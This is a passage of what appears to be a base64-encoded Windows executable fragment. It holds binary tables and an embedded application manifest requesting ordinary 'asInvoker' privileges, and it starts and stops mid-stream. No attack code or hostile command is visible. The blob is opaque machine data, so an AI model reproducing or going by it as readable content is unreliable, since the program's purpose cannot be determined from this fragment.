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CgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANACALQBAAD4ogCjCKMQoxijKKM4o0CjSKNQo1ijYKNoo3CjeKOAo5ijoKOoo7CjuKPAo8ij4KPoo/CjEKQYpCCkKKQwpDikUKRYpGCkaKRwpHikgKSIpJCkmKSgpKiksKS4pMCkyKTQpNik4KTopPCk+KQApQilEKUYpSClKKUwpTilQKVIpVClWKVgpWilcKV4pYCliKWQpZiloKWopbCluKXApcil0KXYpeCl6KXwpfilAKYIphCmGKYgpiimMKY4pkCmSKZQplimYKZopnCmeKaApoimkKaYpqCmqKawprimwKbIptCm2Kbgpuim8Kb4pgCnCKcYpyCnKKcwpzinQKdIp1CnWKdgp2incKd4p4CniKcoqjiqSKpYqmiqeKqIqpiqqKq4qsiq2KroqviqCKsYqyirOKtIq1iraKt4q4irmKuoq7iryKvYq+ir+KsIrBisKKw4rEisWKxorHisiKyYrKisuKzIrNis6Kz4rAitGK0orTitSK1YrWiteK2IrZitqK24rcit2K3orfitCK4YriiuOK5IrliuaK54roiumK6orriuyK7Yruiu+K4AAADgAgAEAQAAyKXQpdil4KXopfCl+KUApgimEKYYpiCmKKYwpjimQKZIplCmWKZgpmimMKg4qFCoWKi4qcCpyKnQqfCpAKoQqiCqMKpAqlCqYKpwqoCqkKqgqrCqwKrQquCq8KoAqxCrIKswq0CrUKtgq3CrgKuQq6CrsKvAq9Cr4KvwqwCsEKwgrDCsQKxQrGCscKyArJCsoKywrMCs0KzgrPCsAK0QrSCtMK1ArVCtYK1wrYCtkK2grbCtwK3QreCt8K0ArhCuIK4wrkCuUK5grnCugK6QrqCusK7ArtCu4K7wrgCvEK8grzCvQK9Qr2CvcK+Ar5CvoK+wr8Cv0K/gr/CvAPACADAAAAAAoBCgIKAwoECgUKBgoHCggKCQoKCgsKDAoNCg4KDwoMCnyKfQpwAAADADAFQBAADQouCi6KLwoviiAKMIoxCjGKMgoyijMKM4o0CjSKNQo1ijEKQgpDCkOKRApEikUKRYpGCkaKR4pICkiKSQpJikoKSopLCkyKTYpOik8KT4pAClCKUQpRilIKUopTClOKVApUilUKVYpWClaKVwpXilgKWIpZClmKWgpailoKuoq7CruKvAq8ir0KvYq+Cr6Kvwq/irAKwIrBCsGKyArIiskKyYrKCsqKywrLiswKzIrNCs2KzgrOis8Kz4rACtCK0QrRitIK0orTCtOK1ArUitUK1YrWCtaK1wrXitgK2IrZCtmK2graitsK24rcCtyK3QreCt6K3wrfitAK4IrhCuGK4griiuMK44rkCuSK5QrliuYK5ornCueK6AroiukK6YrqCuqK6wrriuwK7IrtCu2K7gruiu8K74rgCvCK8QrxivIK8orzCvOK8AAABAAwBEAAAAKKM4o0ijWKNoo3ijiKOYo6ijuKPIo9ij6KP4owikGKQopDikSK